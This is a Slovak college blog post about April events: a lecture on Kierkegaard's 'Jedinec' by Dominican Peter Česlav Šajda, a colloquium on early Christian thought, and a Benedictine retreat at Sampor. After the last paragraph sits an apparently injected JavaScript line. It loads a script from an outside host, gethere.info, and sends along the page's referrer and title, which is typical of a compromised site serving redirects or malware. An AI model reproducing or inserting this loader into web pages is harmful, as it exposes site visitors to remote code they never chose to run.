Aprílový život v Kolégiu

Pred sviatkami Veľkej noci sa toho v našom kolégiu udialo mnoho. 3. apríla sme mali poslednú Svoradovskú prednášku tohto akademického roku. Hostili sme dominikána a filozofa, p. Petra Česlava Šajdu. Je odborníkom na filozofiu Sørena Kierkegaarda. Predstavil nám knihu Jedinec, ktorá vyšla až po smrti svetoznámeho filozofa, v r.1855. Hlavnými „postavami“ knihy sú politika a náboženstvo. Prechádzajú rôzne zafarbenými interakciami, na ktorých je vidieť, ako veľmi sa jedna od druhej líšia. Priepastný rozdiel medzi politikou a náboženstvom je v tom, že kým náboženstvo pochádza od Boha a nemá korene iba na zemi, politika vzniká aj zaniká na zemi. Ako býva zvykom, po prednáške sme sa pýtali ešte množstvo zaujímavých otázok a do diskusie sa zapojilo veľa ľudí. Cyklus Svoradovských prednášok na tento akademický rok už skončil, no veľmi radi by sme Vás už teraz pozvali na tie, ktoré budú budúci rok. Čaká nás určite rovnako zaujímavé a inšpiratívne obsadenie.

Druhým impulzom bolo kolokvium s p. Branislavom Dadom, ktorý je rímskokatolíckym kňazom v Santovke. Rozprával nám o počiatkoch kresťanského teologického myslenia. Debata bola veľmi zaujímavá a otázky padali z každého súdka. Darmo, na históriu a aj kresťanskú, sa dá pozerať z viacerých uhlov pohľadu. P. Dado bol veľmi prívetivý, ochotný sa rozprávať a podať ďalej zaujímavé informácie.

Tretím a jednoznačne najväčším impulzom bola duchovná obnova u benediktínov na Sampore. Čarovné miesto. Náš program pozostával z viacerých častí. Mohli sme sa zúčastňovať na všetkých modlitbách počas dňa spolu s mníchmi. Taktiež sme mali krátke zamyslenia s našim kaplánom Jožkom, ktorý sa nám snažil viac priblížiť niektoré pasáže z evanjelia. Náš čas sme mohli venovať aj osobnej modlitbe, silenciu, prechádzkam v okolitej nádhernej prírode stredného Slovenska. Scelil sa náš duch, scelil sa náš kolektív. Cítili sme sa celé tri dni veľmi dobre a využili sme šancu načerpať síl do toho, čo nás v najbližších mesiacoch čaká.

-mh-s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

0 komentárov

Zanechajte komentár

Chcete sa pripojiť k diskusii?
Neváhajte prispieť!

Pridaj komentár

Vaša e-mailová adresa nebude zverejnená. Vyžadované polia sú označené *